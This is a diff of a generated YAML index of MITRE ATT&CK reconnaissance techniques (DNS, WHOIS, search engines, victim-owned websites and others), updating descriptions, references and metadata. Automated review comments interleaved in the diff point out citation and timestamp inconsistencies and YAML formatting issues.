Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54253,8 +54930,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -54276,7 +54951,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54292,8 +54967,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -54321,7 +54994,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54337,33 +55010,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
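Review bot: the new AXFR paragraph in the T1590.002 description introduces three citations (Trails-DNS, DNS-CISA, Alexa-dns) that must exist as external_references; they are added in the following hunk, and x_mitre_version 1.1 -> 1.2 matches, so the entry is self-consistent. One point to carry upstream or into any local detection notes: the unchanged x_mitre_detection text still says this activity takes place outside the visibility of the target organization, but a zone transfer request against the victim's own misconfigured authoritative server, as the new paragraph describes, is answered by that server and therefore shows up in its query logs, unlike the passive DNS and open-database lookups the rest of the description covers. The description typo fix ("DNS, MX, TXT, and SPF records" -> "DNS MX, TXT, and SPF records") is correct.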
@@ -54377,18 +55050,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
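Review bot: the DNS-CISA reference added here dates the alert "(2016, September 29)" while its URL path reads `/news-events/alerts/2015/04/13/`, so one of the two is wrong; since this is an upstream ATT&CK reference it should be corrected there rather than patched in the generated index, but it is worth raising. Two smaller observations in the same hunk: the Alexa-dns entry has no author ("Scanning Alexa's Top 1M for AXFR. (2015, March 29).") and the Sean Metcalf reference now points at x.com without the `/photo/1` suffix with a retrieved date of September 12, 2024, which reads as a deliberate link refresh rather than a typo.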
@@ -54409,7 +55093,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54425,39 +55109,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
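Review bot: the T1594 description switches from the `|-` literal block style used by every sibling entry to a double-quoted, line-folded scalar with `\n\n` escapes, and the likely cause is visible on the last line of the string: the upstream text ends in a trailing space before the closing quote (`Register Robots TXT 2015) "`). YAML emitters that will not place trailing whitespace in block style fall back to quoted style, which is why this single entry renders differently and why the diff for it is hard to read. Stripping surrounding whitespace from descriptions in the generator (the trailing space carries no meaning) would keep the literal block style and turn the next refresh of this entry into a clean paragraph addition. On content, the new paragraph about sitemap.xml and robots.txt cites Perez Sitemap XML 2023 and Register Robots TXT 2015, both of which are defined in the following hunk, and the contributor is added here, so the data itself is consistent.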
@@ -54465,13 +55147,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
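Review bot: x_mitre_version 1.0 -> 1.1 for T1594 matches the description change in the previous hunk, and the two new external_references (Perez Sitemap XML 2023, Register Robots TXT 2015) cover the citations it added, so this hunk is complete. The x_mitre_detection text is unchanged although the description now mentions requests for sitemap.xml and robots.txt; the retained data source "Application Log: Application Log Content" already covers the web server access logs where those requests, like the rapid request bursts the detection text already describes, would appear, so the index needs nothing further, but if this repository keeps local detection notes for T1594 that is the place to record it.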
@@ -54496,7 +55206,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
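Review bot: the `modified` timestamp in this hunk goes backwards, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:49:13.409Z`, and the same regression appears on most of the sub-techniques below (T1591.003, T1590.004, T1590.003, T1597.001, T1590.006, T1591.002, T1596.004, T1591, T1590). Please confirm the generator is pulling from the intended upstream bundle; a downstream check that compares `modified` to decide whether an entry is newer will treat these regenerated entries as older than what is already committed.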
@@ -54512,8 +55222,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -54535,7 +55243,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54551,8 +55259,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -54578,7 +55284,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54596,13 +55302,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54658,7 +55362,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
@@ -54709,7 +55413,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -54730,7 +55433,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54746,8 +55449,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -54769,7 +55470,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54785,8 +55486,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -54808,7 +55507,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54824,12 +55523,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -54869,8 +55566,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -54915,11 +55612,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -54959,9 +55655,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55023,7 +55718,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55049,7 +55743,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55070,8 +55764,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55136,7 +55828,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55184,7 +55875,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55206,7 +55896,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55222,34 +55912,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
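Review bot: the twenty-two `-` lines in this hunk (`x_mitre_platforms` through `external_references` for T1593.002) are not removed content; they are re-added in the next hunk in a different key order, so the only material changes in this region are the new `revoked: false` and `x_mitre_deprecated: false` keys, the spec version bump and the updated `modified` value. If the generator cannot preserve the upstream key order, emitting keys in a stable sorted order would keep future index diffs reviewable instead of rewriting every technique block.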
@@ -55258,15 +55924,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
